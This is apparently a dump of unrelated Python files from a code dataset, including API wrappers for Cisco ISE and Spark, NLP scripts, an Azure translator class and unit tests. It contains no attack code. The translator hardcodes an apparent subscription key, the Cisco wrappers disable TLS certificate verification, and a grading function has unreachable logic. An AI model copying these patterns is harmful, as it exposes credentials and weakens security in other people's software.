expected_len = len(expected_body)\n\n # NOTE(kgriffs): Append newline char to each line\n # to match readlines behavior\n expected_lines = [(line + '\\n').encode('utf-8')\n for line in data.split('\\n')]\n\n # NOTE(kgriffs): Remove trailing newline to simulate\n # what readlines does\n expected_lines[-1] = expected_lines[-1][:-1]\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(), expected_body)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(2), expected_body[0:2])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.read(expected_len + 1), expected_body)\n\n # NOTE(kgriffs): Test that reading past the end does not\n # hang, but returns the empty string.\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n for i in range(expected_len + 1):\n expected_value = expected_body[i:i + 1] if i < expected_len else b''\n self.assertEqual(body.read(1), expected_value)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(-1), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readline(expected_len + 1), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(-1), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(body.readlines(expected_len + 1), expected_lines)\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n self.assertEqual(next(body), expected_lines[0])\n\n stream = io.BytesIO(expected_body)\n body = request_helpers.Body(stream, expected_len)\n for i, line in enumerate(body):\n self.assertEqual(line, expected_lines[i])\n","sub_path":"tests/test_request_body.py","file_name":"test_request_body.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"524490390","text":"import arrow\nfrom jinja2 import Markup\n\nfrom .. import db\nfrom .base_mt_view import BaseMTView\n\n\nclass News(db.Model):\n __tablename__ = 'news'\n\n # Columns\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200))\n abstract = db.Column(db.String(500))\n content = db.Column(db.Text)\n source = db.Column(db.String(200))\n author = db.Column(db.String(50))\n photo_abstract = db.Column(db.String(255))\n link = db.Column(db.String(255))\n tag = db.Column(db.String(20))\n posted_at = db.Column(db.TIMESTAMP)\n is_deleted = db.Column(db.Boolean)\n review_status = db.Column(db.Boolean)\n created_at = db.Column(db.TIMESTAMP)\n updated_at = db.Column(db.TIMESTAMP)\n\n\nclass NewsView(BaseMTView):\n can_create = True\n can_edit = True\n\n column_labels = dict(\n title='标题',\n abstract='简介',\n content='内容',\n source='来源',\n author='作者',\n tag='标签',\n photo_abstract='缩略图地址',\n link='文章链接',\n posted_at='发布时间',\n is_deleted='隐藏',\n review_status='审核状态',\n created_at='创建时间',\n updated_at='修改时间'\n )\n column_descriptions = dict(\n abstract='显示在列表页的文字',\n photo_abstract='显示在列表页的图片,填写url'\n )\n column_list = (\n 'photo_abstract',\n 'title',\n 'tag',\n # 'abstract',\n 'source',\n 'author',\n 'posted_at',\n # 'link',\n 'is_deleted',\n 'review_status',\n 'created_at',\n 'updated_at'\n )\n\n column_sortable_list = ('posted_at',)\n column_searchable_list = ('title',)\n column_filters = ('author',)\n column_default_sort = ('id', True)\n\n column_editable_list = ('title', 'source', 'link',\n 'author', 'posted_at', 'tag')\n\n form_choices = {\n 'tag': [\n ('news', '教程'),\n ('new_currency', '每日上新'),\n ('token_talk', '币聊')\n ]\n }\n\n def _get_tag(view, context, model, name):\n tags = view.form_choices['tag']\n for (val, display) in tags:\n if val == model.tag:\n return display\n\n return ''\n\n column_formatters = dict(\n photo_abstract=lambda v, c, m, p: BaseMTView._list_thumbnail(\n v, c, m, 'photo_abstract'),\n tag=_get_tag,\n posted_at=lambda v, c, m, p: arrow.get(m.created_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n created_at=lambda v, c, m, p: arrow.get(m.created_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n updated_at=lambda v, c, m, p: arrow.get(m.updated_at)\n .to('Asia/Shanghai')\n .format('YYYY-MM-DD HH:mm:ss'),\n )\n\n form_columns = (\n 'title',\n 'abstract',\n 'tag',\n 'content',\n 'source',\n 'author',\n 'photo_abstract',\n 'link',\n 'is_deleted',\n 'review_status',\n )\n\n def on_model_change(self, form, model, is_created):\n model.updated_at = arrow.now().timestamp\n if is_created:\n model.created_at = arrow.now().timestamp\n model.posted_at = arrow.now().timestamp\n","sub_path":"project/models/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66266844","text":"\"\"\"\n\"\"\"\nimport tensorflow as tf\n\ndef get_items_from_tfrecords(file_path, ret):\n for example in tf.python_io.tf_record_iterator(file_path):\n tf_example = tf.train.Example.FromString(example)\n for k in ret:\n if k in ret:\n storage = ret[k]\n storage[0].append(storage[1](tf_example.features.feature[k]))\n return","sub_path":"data_analytics/video_level.py","file_name":"video_level.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"16515490","text":"import argparse\nimport itertools as it\n\nfrom tqdm import tqdm\n\nfrom utils import AssignmentsConfig\nfrom preprocessing import preprocess\n\n\ndef _check_is_good_combo(student_combo: list, all_students: list, config) -> bool:\n r\"\"\"Checks if a given combination is valid.\n\n Criteria to check:\n (1) All students are accounted for\n (2) No student appears more than once (already checked by (1))\n (3) All lab groups have 3 <= num_members <= 5 (true by assumption from code before)\n \"\"\"\n\n is_good = False\n\n # all students are accounted for and no student is present more than once\n if set([stud for studs in student_combo for stud in studs]) == set(all_students):\n is_good = True\n\n return is_good\n\n\ndef _write_good_combos(good_combos: list, file_name, lab_groups, write_score: bool=False, score: int=0):\n r\"\"\"Writes the given time/student configurations to a specified .txt file.\"\"\"\n\n with open(file_name, \"w\") as f:\n if write_score:\n f.write(f\"Unhappiness level: {score}\\n\")\n for i, (times, combos) in enumerate(good_combos):\n title = f\"Configuration {i+1}\"\n f.write(f\"{title}\\n\" + (\"=\"*len(title)) + \"\\n\")\n\n for j, (time, combo) in enumerate(zip(times, combos)):\n f.write(f\"{lab_groups[j].name} ({time}): \")\n\n for stud in combo:\n f.write(f\" {stud.name}\")\n f.write(\"\\n\")\n f.write(\"\\n\"*4)\n\n\ndef _score_configuration(combination, lab_groups):\n r\"\"\"Calculates the total unhappiness for a given configuration of lab groups.\n\n Calculated as the sum of the indexes into each student's preference list of\n their actual assignment.\n \"\"\"\n\n # calculate the index offset for each student\n total_unhappiness = 0\n\n for i, lg_students in enumerate(combination):\n for stud in lg_students:\n total_unhappiness += stud.preferences.index(lab_groups[i].name)\n\n return total_unhappiness\n\n\ndef find_assignments(students, lab_groups, config):\n\n # match students with lab group times for each lab group\n for lg in lab_groups:\n lg.find_members(students)\n\n good_combos = []\n cart_prod_lg_times = [list(lg.good_times.keys()) for lg in lab_groups]\n\n # I'm not sure if this product will work as coded (since input is list of lists)\n all_time_combos_pbar = tqdm(list(it.product(*cart_prod_lg_times)), desc=\"Going through time combinations\")\n for time_combo in all_time_combos_pbar:\n lg_students = [lg.good_times[time_combo[i]] for i, lg in enumerate(lab_groups)] # list of sets of students\n students_in_time_combo = [stud for studs in lg_students for stud in studs]\n\n # all students accounted for\n if set(students_in_time_combo) == set(students):\n for group_size_combo in it.combinations_with_replacement(config.group_sizes, r=len(lab_groups)):\n # checksum\n if sum(group_size_combo) == len(students):\n all_student_combos = [it.combinations(lg_studs, r=group_size_combo[i]) for i, lg_studs in enumerate(lg_students)] # list of lists of lists\n\n # check if every combination is compatible\n for particular_student_combo in it.product(*all_student_combos):\n\n if _check_is_good_combo(particular_student_combo, students, config):\n good_combos.append((time_combo, particular_student_combo))\n all_time_combos_pbar.update()\n all_time_combos_pbar.refresh()\n\n # record all found combinations and compute scores\n _write_good_combos(good_combos, config.data_dir/\"all_configurations.txt\", lab_groups)\n scores = [_score_configuration(lg_configurations, lab_groups) for (_, lg_configurations) in good_combos]\n\n # get best matching(s) and record results\n try:\n min_score = min(scores)\n best_scores_idx = [i for i, score in enumerate(scores) if score == min_score]\n best_combos = [good_combos[i] for i in best_scores_idx]\n _write_good_combos(best_combos, config.data_dir/\"best_configurations.txt\", lab_groups, write_score=True, score=min_score)\n except ValueError:\n print(\"No lab group configuration was found!\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--s_data\", type=str, default=\"RealishStudentData.csv\",\n help=\"The CSV containing the student data.\")\n parser.add_argument(\"--lg_data\", type=str, default=\"FakeLabGroupData.csv\",\n help=\"The CSV containing the faculty/lab group data.\")\n parser.add_argument(\"--file_format\", type=str, default=\"F_2019\",\n help=\"Determines the parsing of the CSV files (see documentation for more details.\")\n parser.add_argument(\"--min_size\", type=int, default=3,\n help=\"Minimum group size.\")\n parser.add_argument(\"--max_size\", type=int, default=5,\n help=\"Maximum group size.\")\n args = parser.parse_args()\n\n cfg = AssignmentsConfig(student_data_file=args.s_data, lab_group_data_file=args.lg_data,\n file_format=args.file_format,\n min_size=args.min_size, max_size=args.max_size)\n\n student_data, lab_group_data = preprocess(cfg)\n\n find_assignments(student_data, lab_group_data, cfg)\n\n with open(cfg.data_dir/\"finished.txt\", \"w\") as finish_file:\n finish_file.write(\"Finished!\")\n","sub_path":"src/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"181523196","text":"#\n# Dan Kirkwood (dkirkwoo@cisco.com)\n# August 2017\n#\n# A collection of generic API calls to Cisco Identity Services Engine (ISE) and Spark\n# \n#\n#\n# WARNING:\n# This script is meant for educational purposes only.\n# Any use of these scripts and tools is at\n# your own risk. There is no guarantee that\n# they have been through thorough testing in a\n# comparable environment and we are not\n# responsible for any damage or data loss\n# incurred with their use.\n# \n\nimport requests\nimport json\nfrom lxml import etree\nimport xmltodict\n\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass ISEAPI(object):\n\n\tdef __init__(self, server, username, password):\n\t\tself.server = server\n\t\tself.username = username\n\t\tself.password = password\n\n\n\tdef ISEGETE(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric GET request using Etree to parse XML data\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\troot = etree.fromstring(str(response.text))\n\t\t\t\treturn root\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\tdef ISEGETJ(self, url, headers):\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn json.loads(response.text)\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\t\t\n\n\n\tdef ISEGETX(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric GET request using XMLtoDict to parse data\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\troot = xmltodict.parse(response.text)\n\t\t\t\treturn root\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef ISEPOST(self, url, headers, content):\n\t\t\"\"\"\n\t\tGeneric POST\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, auth=(self.username,self.password), headers=headers, data=content, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 201):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in POST -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef ISEDELETE(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric DELETE\n\t\t\"\"\"\n\n\t\ttry:\n\t\t\tresponse = requests.request(\"DELETE\", url, auth=(self.username,self.password), headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 204):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef GetAllEndpoints(self):\n\t\t\"\"\"\n\t\tRetrieve all endpoints in the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint?size=100\"\n\t\theaders = {'accept': \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\n\tdef GetNextEndpoints(self, page):\n\t\tmyurl = page\n\t\theaders = {'accept': \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\t\t\n\n\n\tdef GetEndpointByID(self, endpointID):\n\t\t\"\"\"\n\t\tRetrieve specific Endpoint data using the unique ISE ID\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint/\"+endpointID\n\t\theaders = {'accept' : \"application/json\"}\n\t\treturn self.ISEGETJ(myurl, headers)\n\n\n\tdef CreateEndpoint(self, content):\n\t\t\"\"\"\n\t\tCreate an endpoint in the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint\"\n\t\theaders = {'content-type': \"application/vnd.com.cisco.ise.identity.endpoint.1.0+xml; charset=utf-8\"}\n\t\t#print content\n\t\treturn self.ISEPOST(myurl, headers, content)\n\n\n\tdef DeleteEndpoint(self, endpointID):\n\t\t\"\"\"\n\t\tDelete an Endpoint from the ISE deployment\n\t\t\"\"\"\n\t\tmyurl = \"https://\"+self.server+\":9060/ers/config/endpoint/\"+endpointID\n\t\theaders = {'accept': \"application/vnd.com.cisco.ise.identity.endpoint.1.0+xml\"}\n\t\treturn self.ISEDELETE(myurl, headers)\n\n\n\tdef MacTransform(self, macAddress):\n\t\t\"\"\"\n\t\tTake input MAC address using any delimiter, and transform to the : delimiter with uppercase characters to make suitable for ISE\n\t\t\"\"\"\n\t\tletters = (\":\" if i % 3 == 0 else char for i, char in enumerate(macAddress.upper(), 1))\n\t\ttransMac = str(''.join(letters))\n\t\treturn transMac\n\n\n\nclass SparkAPI(object):\n\n\t\"\"\"\n\tRequires a known bot ID and Room ID for retrieving and creating messages\n\t\"\"\"\n\n\tdef __init__(self, botID):\n\t\tself.botID = botID\n\n\tdef SparkGET(self, url, headers):\n\t\t\"\"\"\n\t\tGeneric Spark GET\n\t\t\"\"\"\n\t\t\n\t\ttry:\n\t\t\tresponse = requests.request(\"GET\", url, headers=headers, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\n\tdef SparkPOST(self, url, headers, payload):\n\t\t\"\"\"\n\t\tGeneric Spark POST\n\t\t\"\"\"\n\t\t\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, headers=headers, data=payload, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\n\n\tdef SparkJSONPOST(self, url, headers, payload):\n\t\ttry:\n\t\t\tresponse = requests.request(\"POST\", url, headers=headers, json=payload, verify=False)\n\t\t\tstatus_code = response.status_code\n\t\t\tif (status_code == 200):\n\t\t\t\treturn response.text\n\t\t\telse:\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tprint(\"Error occured in GET -->\"+(response.text))\n\t\texcept requests.exceptions.HTTPError as err:\n\t\t\tprint (\"Error in connection -->\"+str(err))\n\t\tfinally:\n\t\t\tif response : response.close()\t\t\n\n\n\tdef GETMessage(self, messageID):\n\t\t\"\"\"\n\t\tGet a message from its unique Spark Message ID\n\t\t\"\"\"\n\t\t\n\t\turl = 'https://api.ciscospark.com/v1/messages/'+messageID\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkGET(url, headers)\n\n\tdef GETPerson(self, userID):\n\t\t\"\"\"\n\t\tGet details of a Spark user\n\t\t\"\"\"\n\n\t\turl = 'https://api.ciscospark.com/v1/people/'+userID\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkGET(url, headers)\n\n\tdef POSTMessage(self, payload):\n\t\t\"\"\"\n\t\tCreate a message in Spark\n\t\t\"\"\"\n\n\t\turl = 'https://api.ciscospark.com/v1/messages'\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkPOST(url, headers, payload)\n\n\tdef POSTMarkdownMessage(self, payload):\n\n\t\turl = 'https://api.ciscospark.com/v1/messages'\n\t\theaders = {'content-type' : 'application/json; charset=utf-8', 'authorization' : \"Bearer \"+self.botID}\n\t\treturn self.SparkJSONPOST(url, headers, payload)\n","sub_path":"python/ISEAPI.py","file_name":"ISEAPI.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569472906","text":"import csv\nimport nltk\nfrom textblob import TextBlob\nimport spacy\n\n\n# TextBlob approach\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/TextBlob.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n blob = TextBlob(row['PII'])\n system_name_and_noun_phrases = [row['System Name']] + blob.noun_phrases\n writer.writerow(system_name_and_noun_phrases)\n\n\n# Simple nlp noun checker\nis_noun = lambda pos: pos[:2] == 'NN'\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/simple_nlp_nouns.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n tokenized = nltk.word_tokenize(row['PII'])\n nouns = [word for (word, pos) in nltk.pos_tag(tokenized) if is_noun(pos)] \n system_name_and_nouns = [row['System Name']] + nouns\n writer.writerow(system_name_and_nouns)\n\n\n# More complicated nlp phrase checker \ngrammar = \"NP: {*+**}\"\ncp = nltk.RegexpParser(grammar)\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/complicated_nlp_phrases.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n sentences = nltk.sent_tokenize(row['PII'])\n sentences = [nltk.word_tokenize(sent) for sent in sentences]\n sentences = [nltk.pos_tag(sent) for sent in sentences]\n phrases = []\n for sentence in sentences:\n result = cp.parse(sentence)\n for chunk in result:\n try:\n phrase = [word for (word, tag) in chunk.leaves()]\n phrase = \" \".join(phrase)\n phrases.append(phrase)\n except:\n pass\n system_name_and_phrases = [row['System Name']] + phrases\n writer.writerow(system_name_and_phrases)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\nwith open('gsa_sorns.csv') as sorn_csv:\n with open('noun_extracting/spacy_noun_phrases.csv', 'w') as output:\n reader = csv.DictReader(sorn_csv)\n writer = csv.writer(output)\n for row in reader:\n nlp_text = nlp(row['PII'])\n noun_phrases = [chunk.text for chunk in nlp_text.noun_chunks]\n writer.writerow(noun_phrases)\n \n","sub_path":"noun_finder.py","file_name":"noun_finder.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343492994","text":"import json\nimport unittest\nimport dataset.loader\nimport pandas as pd\n\n\nclass TestDatasetLoaderExternalDataLoader(unittest.TestCase):\n \"\"\"Tests for the ExternalDataLoader class.\"\"\"\n\n class FakeResponse:\n \"\"\"The FakeResponse class makes a fake response by a self-specified status code and content.\"\"\"\n\n def __init__(self, status_code, content):\n self.status_code = status_code\n self.content = content.encode('utf-8') if content is not None else None\n\n class FakeRequests:\n \"\"\"The FakeRequests class fakes the requests library and has a custom get() method which always delivers the\n given FakeResponse.\"\"\"\n\n def __init__(self, fake_response):\n self.fake_response = fake_response\n self.call_count = 0\n\n def get(self, url):\n self.call_count += 1\n return self.fake_response\n\n def test_get_csv(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content='header1,header2' + \"\\n\" + 'cell1,cell2'\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-csv'] = {\n 'path': 'test.csv',\n 'parser': dataset.loader.ExternalDataLoader.parse_csv\n }\n\n # Try to fetch the file\n result = loader.get('test-csv', ignore_cache=True)\n\n # Check whether the content is correct\n self.assertIsInstance(result, pd.DataFrame)\n self.assertEqual(result.shape[0], 1)\n self.assertListEqual(result.columns.tolist(), ['header1', 'header2'])\n self.assertDictEqual(result.iloc[0].to_dict(), {'header1': 'cell1', 'header2': 'cell2'})\n\n def test_get_json(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n result = loader.get('test-json', ignore_cache=True)\n\n # Check whether the content is correct\n self.assertIsInstance(result, pd.DataFrame)\n self.assertEqual(result.shape[0], 1)\n self.assertListEqual(result.columns.tolist(), ['hello'])\n self.assertDictEqual(result.iloc[0].to_dict(), {'hello': 'world'})\n\n def test_404_response(self):\n # Fake a 404 (file not found) response\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=404,\n content=\"\"\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n\n # Try to fetch any file (which will encounter a 404 by the fake request)\n first_file = list(loader.files.keys())[0]\n\n # Trying to fetch the file should raise a ValueError\n with self.assertRaises(ValueError):\n loader.get(first_file, ignore_cache=True)\n\n def test_get_unknown_file(self):\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n\n # Trying to fetch an unknown file should raise a ValueError\n unknown_file = '$unknown_file'\n with self.assertRaises(ValueError):\n loader.get(unknown_file, ignore_cache=True)\n\n def test_cache_mechanism(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n first_result = loader.get('test-json')\n\n # Now try to fetch the file for the second time\n second_result = loader.get('test-json')\n\n # Check whether the URL is called only once and whether the results are equal\n self.assertDictEqual(first_result.to_dict(), second_result.to_dict())\n self.assertEqual(1, dataset.loader.requests.call_count)\n\n def test_ignore_cache(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n first_result = loader.get('test-json', ignore_cache=True)\n\n # Now try to fetch the file for the second time\n second_result = loader.get('test-json', ignore_cache=True)\n\n # Check whether the URL is called every time (since the ignore_cache flag is true) and whether the results are\n # equal\n self.assertDictEqual(first_result.to_dict(), second_result.to_dict())\n self.assertEqual(2, dataset.loader.requests.call_count)\n","sub_path":"tests/test_dataset_loader_external_data_loader.py","file_name":"test_dataset_loader_external_data_loader.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"222350450","text":"\"\"\"\r\nthis is a simple class to translate long texts using free Translator(F0) service, which is provided by MS Azure.\r\n\r\nit has the following functionalities:\r\n- translates from A language to B language\r\n- displays translation result\r\n- lang list: [https://docs.microsoft.com/en-us/azure/cognitive-services/translator/language-support]\r\n\r\nChangelog\r\n- v0.0.1, initial version\r\n\r\n@ZL, 20210121\r\n\r\n\"\"\"\r\n\r\nimport requests, uuid, json\r\n\r\nclass AzureTranslator:\r\n # Add your subscription key and endpoint\r\n __subscription_key = \"399a485f234544dcb07d2723ff65186a\" # key may expire. have to freshen it from your subscription\r\n __endpoint = \"https://api.cognitive.microsofttranslator.com/\"\r\n\r\n # Add your location, also known as region. The default is global.\r\n # This is required if using a Cognitive Services resource.\r\n __location = \"japaneast\"\r\n\r\n __path = '/translate'\r\n __constructed_url = __endpoint + __path\r\n\r\n def __init__(self, raw_text: str, from_lang_code: str = 'ja', to_lang_code: str = 'zh-Hans'):\r\n self.params = {\r\n 'api-version': '3.0',\r\n 'from': 'ja', # from lang code\r\n 'to': 'zh-Hans' # to lang code\r\n }\r\n self.constructed_url = self.__endpoint + self.__path\r\n\r\n self.headers = {\r\n 'Ocp-Apim-Subscription-Key': self.__subscription_key,\r\n 'Ocp-Apim-Subscription-Region': self.__location,\r\n 'Content-type': 'application/json',\r\n 'X-ClientTraceId': str(uuid.uuid4())\r\n }\r\n\r\n # You can pass more than one object in body.\r\n self.body = [{\r\n 'text': raw_text\r\n }]\r\n\r\n def start(self):\r\n request = requests.post(self.__constructed_url, params=self.params, headers=self.headers, json=self.body)\r\n response = request.json()\r\n # res = json.dumps(response, sort_keys=True, ensure_ascii=False, indent=4, separators=(',', ': '))\r\n res = response[0]['translations'][0]['text']\r\n return res","sub_path":"side-pkg-aurora/translator/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148147443","text":"from os import listdir\nfrom os.path import isfile, join\n\n\npath = input(\"Directory >: \")\nfile_list = [f for f in listdir(path) if isfile(join(path, f))]\n\nf = open(\"filesindir.txt\", 'w')\nfor file in file_list:\n string = \"project/\" + file + \"\\n\"\n print(string)\n f.write(string)\n\nf.close()\n","sub_path":"bot/getfiles.py","file_name":"getfiles.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185356298","text":"def faixa_notas (lista):\n lista1 = 0\n lista2 = 0\n lista3 = 0\n for x in lista:\n if x <=7:\n lista2 +=1\n elif x < 5:\n lista1 +=1\n else:\n lista3 +=1\n resultado = [lista1,lista2,lista3]\n return resultado\n \n ","sub_path":"backup/user_052/ch140_2020_04_01_20_03_29_563193.py","file_name":"ch140_2020_04_01_20_03_29_563193.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462628984","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nfrom src.fibonacci import fib\n\n\nclass TestFibonacciNumbers(unittest.TestCase):\n\n def test_zero(self):\n self.assertEqual(fib(0), 0)\n\n def test_simple(self):\n test_cases = [\n (1, 1),\n (2, 1),\n (3, 2),\n (4, 3),\n (5, 5),\n (10, 55)\n ]\n\n for n, fib_n in test_cases:\n with self.subTest(i=n):\n self.assertEqual(fib(n), fib_n)\n\n def test_negative(self):\n with self.subTest(i=1):\n self.assertRaises(ArithmeticError, fib, -1)\n\n with self.subTest(i=1):\n self.assertRaises(ArithmeticError, fib, -10)\n\n def 